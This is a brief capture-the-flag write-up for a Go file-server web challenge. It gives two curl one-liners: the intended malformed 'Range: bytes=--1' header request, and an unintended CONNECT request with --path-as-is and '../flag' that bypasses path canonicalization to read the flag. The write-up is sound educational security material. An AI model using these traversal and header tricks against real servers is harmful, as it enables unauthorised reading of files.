Rating: 5.0
TL;DR: https://github.com/golang/go/issues/40940
The intended solution: curl -H 'Range: bytes=--1' http://gofs.web.jctf.pro/IMG_1052.jpg
However, during the CTF one team solved it via an unintended way!:
$ curl --path-as-is -X CONNECT http://gofs.web.jctf.pro/../flag
Should have found that earlier and block it, but oh well :).
Turned out the CONNECT method does not perform the path canonicalization and it is actually documented in the Golang source code: https://github.com/golang/go/blob/9bb97ea047890e900dae04202a231685492c4b18/src/net/http/server.go#L2354-L2364
Thanks to @themalwareman for pointing this out :)
